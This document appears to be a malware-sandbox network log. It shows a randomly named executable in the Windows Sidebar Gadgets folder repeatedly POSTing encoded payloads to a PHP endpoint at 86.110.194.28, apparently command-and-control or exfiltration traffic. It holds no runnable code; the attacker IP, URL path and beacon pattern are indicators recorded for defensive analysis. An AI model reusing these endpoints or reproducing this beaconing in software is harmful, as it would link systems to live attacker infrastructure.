                                                                                                                                                                  Jan 3, 2025 09:08:46.288162947 CET  376  OUT  POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                  100  192.168.2.4  50107  86.110.194.28  80  7744  C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                  Jan 3, 2025 09:08:46.432207108 CET  376  OUT  POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2140
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:46.785794020 CET  2140  OUT
                                                                                                                                                                  Jan 3, 2025 09:08:47.109169960 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:47.248447895 CET  380  IN  HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:47 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                  101  192.168.2.4  50108  86.110.194.28  80  7744  C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                  Jan 3, 2025 09:08:46.551809072 CET  376  OUT  POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:46.910687923 CET  2576  OUT
                                                                                                                                                                  Jan 3, 2025 09:08:47.248105049 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:47.381608009 CET  207  IN  HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:47 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                  102  192.168.2.4  50109  86.110.194.28  80  7744  C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                  Jan 3, 2025 09:08:47.508972883 CET  352  OUT  POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:47.863890886 CET  2576  OUT
                                                                                                                                                                  Jan 3, 2025 09:08:48.200901031 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:48.332075119 CET  151  IN  HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:48 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                  103  192.168.2.4  50110  86.110.194.28  80  7744  C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                  Jan 3, 2025 09:08:48.460347891 CET  376  OUT  POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:48.819817066 CET  2576  OUT
                                                                                                                                                                  Jan 3, 2025 09:08:49.151549101 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:49.285171986 CET  207  IN  HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:49 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                  104  192.168.2.4  50111  86.110.194.28  80  7744  C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                  Jan 3, 2025 09:08:49.413886070 CET  376  OUT  POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:49.770046949 CET  2568  OUT
                                                                                                                                                                  Jan 3, 2025 09:08:50.132627010 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:50.267740011 CET  207  IN  HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:50 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                  105  192.168.2.4  50112  86.110.194.28  80  7744  C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                  Jan 3, 2025 09:08:50.395589113 CET  376  OUT  POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:50.754479885 CET  2576  OUT
                                                                                                                                                                  Jan 3, 2025 09:08:51.257714033 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:51.257735968 CET  207  IN  HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:50 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.4 | 50113 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:51.438682079 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:08:51.785674095 CET | 2576 | OUT | Data Raw: 5b 5d 5e 51 5d 5e 50 5f 54 5b 59 5a 5b 5f 57 5b 5f 50 5a 5a 52 55 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
Data Ascii: []^Q]^P_T[YZ[_W[_PZZRUPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+==!\,1,A>;-%791?) '54;7%:(@$?<V<)#Y'$X.
Jan 3, 2025 09:08:52.142260075 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.4 | 50114 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:52.260279894 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2164
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:08:52.613795042 CET | 2164 | OUT | Data Raw: 5e 52 5b 58 5d 5b 50 5b 54 5b 59 5a 5b 56 57 5b 5f 54 5a 55 52 5c 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
Data Ascii: ^R[X][P[T[YZ[VW[_TZUR\PE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?["*%=;'$%?57=U7^00;3$S()#Y'$X.%
Jan 3, 2025 09:08:52.949110031 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:53.079885006 CET | 380 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 0d 1d 27 01 26 05 2e 5a 28 2c 38 07 26 23 2d 5e 23 33 3b 04 38 1e 2a 45 35 3f 26 06 25 2b 0a 56 3c 3e 2a 45 29 20 26 0e 34 3d 39 53 28 0a 28 5d 03 10 39 5a 28 04 33 11 3e 10 0c 00 2c 34 3f 14 24 09 24 5b 2a 23 25 1c 25 3c 07 0c 20 2d 23 52 29 33 26 00 26 28 38 5b 2b 20 0e 06 27 07 20 54 0b 17 24 0f 24 56 24 07 26 28 25 58 2a 19 12 5b 30 04 0f 56 36 3f 35 0e 23 39 0e 16 3b 56 39 11 24 38 35 53 3e 3d 37 55 31 3a 22 11 26 3b 2e 5c 23 0f 28 55 0d 34 57 50
Data Ascii: '&.Z(,8&#-^#3;8*E5?&%+V<>*E) &4=9S((]9Z(3>,4?$$[*#%%< -#R)3&&(8[+ ' T$$V$&(%X*[0V6?5#9;V9$85S>=7U1:"&;.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.4 | 50115 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:52.381704092 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:08:52.738790989 CET | 2576 | OUT | Data Raw: 5b 51 5e 50 58 5e 55 5b 54 5b 59 5a 5b 5f 57 58 5f 54 5a 5a 52 56 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
Data Ascii: [Q^PX^U[T[YZ[_WX_TZZRVPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&C+>"5 T1<=;Y'42/) '94+?''&/')9#Y'$X.
Jan 3, 2025 09:08:53.066138029 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:53.198203087 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.4 | 50116 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:53.333003998 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Jan 3, 2025 09:08:53.691917896 CET | 2576 | OUT | Data Raw: 5b 50 5e 51 58 5b 50 58 54 5b 59 5a 5b 5f 57 58 5f 50 5a 5a 52 55 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
Data Ascii: [P^QX[PXT[YZ[_WX_PZZRUPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&A)=!]#)8T%,+=+)07)'/ $#(,0*;' W?9#Y'$X.
Jan 3, 2025 09:08:54.039464951 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:54.169151068 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.4 | 50117 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:54.286580086 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:08:54.645311117 CET | 2576 | OUT | Data Raw: 5e 51 5e 5e 58 5a 50 50 54 5b 59 5a 5b 53 57 5d 5f 50 5a 54 52 5d 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
Data Ascii: ^Q^^XZPPT[YZ[SW]_PZTR]PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D?>"*$%,E*+04=X&6!45T!(0$:;3+)#Y'$X.1
Jan 3, 2025 09:08:54.996892929 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:55.130256891 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.4 | 50118 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:55.256993055 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:08:55.613806009 CET | 2576 | OUT | Data Raw: 5e 51 5e 5f 5d 5b 55 58 54 5b 59 5a 5b 53 57 59 5f 53 5a 5a 52 51 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
Data Ascii: ^Q^_][UXT[YZ[SWY_SZZRQPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&C+X=[6*+%(D=*Z079[& 4=U4;7'@$,'+)#Y'$X.1
Jan 3, 2025 09:08:55.934767008 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:56.062140942 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  112192.168.2.45011986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:56.193258047 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:56.551321030 CET | 2576 | OUT | Data Raw: 5b 55 5b 5f 5d 5a 50 59 54 5b 59 5a 5b 50 57 5b 5f 5d 5a 5a 52 5d 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [U[_]ZPYT[YZ[PW[_]ZZR]PG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<.!5,$?/)^0'=Y2%6=V7(0 @$,#))#Y'$X.
Jan 3, 2025 09:08:56.881352901 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:57.010067940 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:56 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.4 | 50120 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:57.146694899 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:57.529161930 CET | 2576 | OUT | Data Raw: 5b 5d 5e 58 5d 59 50 5a 54 5b 59 5a 5b 5f 57 5d 5f 54 5a 54 52 5c 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^X]YPZT[YZ[_W]_TZTR\PC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B)=!]5\,R2<)8.^%4\%Y5P"7>7,%90S))#Y'$X.
Jan 3, 2025 09:08:57.860397100 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:57.994900942 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:57 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.4 | 50121 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:58.088395119 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
